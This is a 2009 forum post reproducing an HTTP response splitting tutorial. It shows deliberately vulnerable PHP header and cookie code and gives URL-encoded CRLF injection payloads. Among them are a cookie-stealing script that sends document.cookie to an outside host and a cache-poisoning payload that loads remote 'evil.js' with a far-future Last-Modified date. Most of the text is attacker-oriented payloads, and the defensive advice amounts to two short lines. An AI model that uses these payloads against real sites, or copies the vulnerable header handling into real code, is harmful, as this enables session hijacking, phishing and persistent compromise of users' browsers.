Gonzalez Posted December 30, 2009 Report Posted December 30, 2009 Author: RaimondHTTP Splitting TutorialContents1.0 What is HTTP Splitting2.0 Attack Methodology2.1 Vulnerable Scripts2.2 Attack Payloads3.0 Securing Code4.0 End1.0 What is HTTP SplittingHTTP Splitting (or HTTP Response Splitting) is method of attacking web applications by exploiting poor input validation and by taking advantage of the HTTP protocol.HTTP Splitting occurs when a attacker inputs arbitrary headers to control the server response.It can be used to deliver many attack payloads such as web cache poisoning, XSS, hijacking the page data, and other client side attacks.2.0 Attack MethodologyTo perform a HTTP splitting attack the CR (Command Return. Also represented by %0d and \r) and LF (Line Feed. Also represented by %0a and \n) characters must be used to forge the servers response by injecting headers. Here is an example of a normal request to a example login script:Request:POST /login.php HTTP/1.1Host: site.comUser-Agent: Mozilla/5.06Accept: text/htmlAccept-Language: en-us,en;q=0.5Accept-Encoding: gzip,deflateAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7Keep-Alive: 300Connection: keep-aliveReferer: http://www.site.com/login.phpCookie: test_cookie=1234Content-Type: text/htmlContent-Length: 98username=USER&password=PASS&submit=Login&redirect=http%3A%2F%2Fwww.site.com%2Fadmin%2FResponse:HTTP/1.x 302 FoundLocation: http://www.site.com/admin/Date: Tue, 29 Dec 2009 16:12:01 GMTServer: Apache/1.3.41 (Unix) mod_log_bytes/1.2 mod_bwlimited/1.4 mod_ssl/2.8.31 OpenSSL/0.9.7aX-Powered-By: PHP/5.2.6Set-Cookie: test_cookie=1234; path=/Last-Modified: Tue, 29 Dec 2009 16:12:01 GMTKeep-Alive: timeout=1, max=10000Connection: Keep-AliveTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Now, the part of the request we are interested in is the post content (It is URL encoded. You can decode it for better viewing at http://meyerweb.com/eric/tools/dencoder/):username=USER&password=PASS&submit=Login&redirect=http%3A%2F%2Fwww.site.com%2Fadmin%2FNotice the redirect parameter. This parameter is put into the server's response headers:HTTP/1.x 302 FoundLocation: http://www.site.com/admin/ <--- User InputWe can use the for our advantage by modifying the redirect parameter.2.1 Vulnerable ScriptsAs you already know any script that uses user input in the server's response headers is vulnerable. Many web services do this is the form of a redirect and in some cases, setting a cookie.Below are two vulnerable code examples.Setting Cookies in PHP:<?php$name = $_GET['name'];$session = "sup3rs3cr3tsessiondata";setcookie("session", $session);setcookie("name", $name);?>User's Request:http://www.site.com/setcookie.php?name=RaimondServer's Response:HTTP/1.1 200 OKContent-type: text/htmlSet-Cookie: session=sup3rs3cr3tsessiondata; name=Raimond <--- User InputRedirecting in PHP:<?phpheader("Location: $_GET['page'];");?>User's Request:http://www.site.com/redirect.php?redirect=http://www.newsite.comServer's Response:HTTP/1.x 302 FoundLocation: http://www.newsite.com/ <--- User InputWe will cover these attacking these scripts in the next section.I encourage you to install a web server (I run apache) and run these scripts to get a better understanding of HTTP Splitting. Note that PHP 5.1.2+ has been secured against HTTP Response Splitting thanks to the PHP Hardening Project! (Asp and other server languages are still vulnerable)2.2 Injecting PayloadsOk. Lets move onto injecting our headers. To create a new response we can fully control we must end the genuine response by using Content-Length: 0. If you know anything about HTTP you know that Content-Length: 0 tells the browser that there is nothing left to read (No HTML to parse) from the servers response. We can inject our Content-Length by using one set of raw CRLF symbols. Here is an example.Normal Requesthttp://www.site.com/redirect.php?page=Content-Length%3a%2001njected!http://www.site.com/redirect.php?page=%0d%0aContent-Length%3a%200(This is URL encoded. Use URL Decoder/Encoder to decode it.)%0d%0aContent-Length%3a%200 is the same as \r\nContent-Length: 0.The \r\n (or %0d%0a in URL encoding) are the CR and LF characters. Think of these characters as the "\n" character in c++ or the result of pressing enter on your keyboard while running a word processor. Here is an example of what happens in the HTTP response after submitting a normal request and a injected request.Normal ResponseHTTP/1.1 302 FoundLocation: Content-Length: 0Injected!HTTP/1.1 302 FoundLocation:(our CRLF characters made a newline)Content-Length: 0Now we can start a forged HTTP response!http://www.site.com/redirect.php?page=%0d%0aContent-Length%3a%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type%3a%20text/html%0d%0aContent-Length%3a%2020%0d%0a%0d%0a%3Chtml%3EHacked%3C%2Fhtml%3E(Again this is encoded. Decode it for better viewing.)Response (\r\n represents where we injected the %0d%0a CRLF characters)HTTP/1.1 302 FoundLocation:\r\nContent-Length: 0\r\n\r\nHTTP/1.1 200 OK\r\nContent-Type: text/html\r\nContent-Length: 20\r\n\r\n<html>Hacked</html>OK! We can change the servers response! Whats so great about this? Well, with HTTP Response Splitting we can deliver many attack payloads which I will cover in the next section.XSS And Other Client Side AttacksWell this should be straight forward. Just replace "<html>Hacked</html>" in the previous example with your attack payload. Don't forget to change the Content-Length to the length of your payload.Cookie Stealing Payloadhttp%3A%2F%2Fwww.site.com%2Fredirect.php%3Fpage%3D%0D%0AContent-Length%3A%200%0D%0A%0D%0AHTTP%2F1.1%20200%20OK%0D%0AContent-Type%3A%20text%2Fhtml%0D%0AContent-Length%3A%20120%0D%0A%0D%0A%3Cscript%3Edocument.location%3D%22http%3A%2F%2Fwww.cookiejar.com%2Fcookies.php%3Fcookie%3D%22%2Bdocument.cookie%3B%3C%2Fscript%3E%0AHTTP ResponseHTTP/1.1 302 FoundLocation:\r\nContent-Length: 0\r\n\r\nHTTP/1.1 200 OK\r\nContent-Type: text/html\r\nContent-Length: 120\r\n\r\n<script>document.location="http://www.cookiejar.com/cookies.php?cookie="+document.cookie;</script>If you don't understand this script you need to learn XSS. Of course other client side attacks such as phishing, forging pages, internal scanning/discovery, CSRF can be executed through HTTP Splitting.Cache PoisoningBefore I explain cache poisoning I will explain how web cache's work. The web cache is a storage bank for web pages and pictures. By using a web cache the user doesn't have to reconnect to the server everytime it revisits a page. The user's browser can just grab the saved page from the local cache as long as the server doesn't report that there is a newer version of the page available (if the page has been modified the browser will grab the new version of the page). So here's the scenario: You login to your homepage and your browser caches it. The pages response headers look like so:HTTP/1.x 302 FoundLocation: http://www.site.com/user/home.htmLast-Modified: Tue, 29 Dec 2009 16:00:00 GMTServer: Apache/1.3.41 (Unix) mod_log_bytes/1.2 mod_bwlimited/1.4 mod_ssl/2.8.31 OpenSSL/0.9.7aX-Powered-By: PHP/5.2.6Set-Cookie: test_cookie=1234; path=/Keep-Alive: timeout=1, max=10000Connection: Keep-AliveTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Content-Length: 200<html>[Content Here]</html>Note the Last-Modified header!Then the next day you login and the response look like so:HTTP/1.x 302 FoundLocation: http://www.site.com/user/home.htmlLast-Modified: Wed, 30 Dec 2009 12:00:00 GMTServer: Apache/1.3.41 (Unix) mod_log_bytes/1.2 mod_bwlimited/1.4 mod_ssl/2.8.31 OpenSSL/0.9.7aX-Powered-By: PHP/5.2.6Set-Cookie: test_cookie=1234; path=/Keep-Alive: timeout=1, max=10000Connection: Keep-AliveTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Content-Length: 200<html>[Content Here]</html>The Last-Modified header has been changed to a later date thus your browser updates it's cache with the new page. We can exploit this behavior by setting the Last-Modified date to a date in the far future (Last-Modified: Sun, 1 Jan 2050 12:00:00 GMT). By doing so the browser will cache the page and not update it until the date on the Last-Modified header or until the cache is cleared! We can use HTTP Splitting to forge a page and control it everytime the user browses to it!Cache Poisoning Requesthttp%3A%2F%2Fwww.site.com%2Fredirect.php%3Fpage%3D%0D%0AContent-Length%3A%200%0D%0A%0D%0AHTTP%2F1.1%20200%20OK%0D%0AContent-Type%3A%20text%2Fhtml%0D%0ALast-Modified%3A%20Sun%2C%201%20Jan%202050%2012%3A00%3A00%20GMT%0D%0AContent-Length%3A%20100%0D%0A%0D%0A%3Cscript%20src%3D%22http%3A%2F%2Fwww.evilsite.com%2Fevil.js%22%3E%3C%2Fscript%3E%0D%0AResponse (Don't forget \r\n stands for the CRLF or %0d%0a characters we injected)HTTP/1.1 302 FoundLocation:\r\nContent-Length: 0\r\n\r\nHTTP/1.1 200 OK\r\nContent-Type: text/html\r\nLast-Modified: Sun, 1 Jan 2050 12:00:00 GMT\r\nContent-Length: 100\r\n\r\n<script src="http://www.evilsite.com/evil.js"></script>Note the Last-Modified header. Since we set the last modified header to a future date (40 years from now) the browser will not update its cache until then or until cache is cleared! Everytime the victim visits the injected page our payload will execute. The payload in this example is a remote js. The remote js file can be coded to do anything the attackers wants. An ideal attack would be to launch a xss shell and perform further attacks from there.Since we control data on the page we can forge data, phish credentials, and copy the html contents! Many more client-side attacks can be executed because of the control we have over the html.This ends the Attack Payloads section. Remember to think outside the box when performing HTTP Splitting. Many things can be done with it!3.0 Securing CodeSecuring in PHP:Upgrade to newest version Wink!Securing in ASP:Use EnableHeaderChecking Property to encode the CR and LF characters.4.0 EndWell this is goodbye. I hope you enjoyed and understood the tutorial. Please give suggestions and comments for enhancing the quality of this tut. Thanks!Resources:http://h4k.in/encoding/http://meyerweb.com/eric/tools/dencoder/http://en.wikipedia.org/wiki/Hypertext_Transfer_Protocol 1 Quote